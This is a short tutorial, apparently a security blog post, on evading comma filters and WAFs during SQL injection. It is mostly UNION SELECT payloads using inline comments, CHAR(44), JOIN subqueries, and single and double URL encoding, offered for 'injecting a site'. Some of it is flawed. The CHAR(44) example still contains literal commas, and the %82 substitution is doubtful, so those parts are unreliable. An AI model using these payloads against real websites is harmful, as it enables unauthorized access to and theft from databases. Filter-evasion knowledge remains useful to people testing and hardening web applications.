Sql Injection – Inject A Site When Commas Are Blocked

In this tutorial I will show you how to inject a site when the comma character is blocked by a filter or WAF. Injecting a site when commas are blocked is easy.

There are several ways to get past a comma filter in SQL injection.

# Method 1

By wrapping the comma in an inline comment, like:

```sql
union select 1/*!,*/ 2/*!,*/ 3

union select 1/*,*/ 2/*,*/ 3
```

# Method 2

We can use CHAR(44), where 44 is the ASCII code of the comma. After the WAF strips out the regular commas, the ones written as CHAR(44) may remain.

```sql
union select 1,CHAR(44), 2,CHAR(44), 3
```

# Method 3

We can use the JOIN keyword instead of commas:

```sql
(select 1)a join (select 2)b join (select 3)c
```

# Method 4

Escaped encoding, URL encoding, or percent-encoding is a way of representing characters within a URL that would otherwise need special handling to be interpreted correctly. The character is encoded as a sequence of three characters: the percent sign % followed by the two hexadecimal digits of the octet code of the original character. For example, in the US-ASCII character set the comma has octet code 44, or hexadecimal 2C, so its URL-encoded representation is %2C.

```sql
union select 1%2C 2%2C 3
```

# Method 5

We can also replace the comma with %82.

```sql
union select 1%82 2%82 3
```

# Method 6

Sometimes this basic URL-encoding trick does not work, but you can circumvent the WAF by double URL-encoding the blocked character(s). In the double-encoded form the % character of the original encoding is itself URL-encoded in the normal way (as %25), so the double-URL-encoded value of the comma (%2C) is %252C.

```sql
union select 1%252C 2%252C 3
```

Thanks for reading, guys. My next tutorial will be on bypassing white-space filters. Keep sharing and learning 🙂

Author: Ahmed Raza Memon

I am a 17-year-old Ethical Hacker, Penetration Tester, Web Security Expert and Exploit Writer from India. My areas of expertise include Ethical Hacking, Vulnerability Assessment, Information Security Audits, Penetration Testing, Exploit Writing, Web Application Security, Source Code Reviews, Forensic Investigation and Cyber Law. I have been acknowledged by many top companies like Microsoft, Apple, SAP, AOL, Sony and many more...
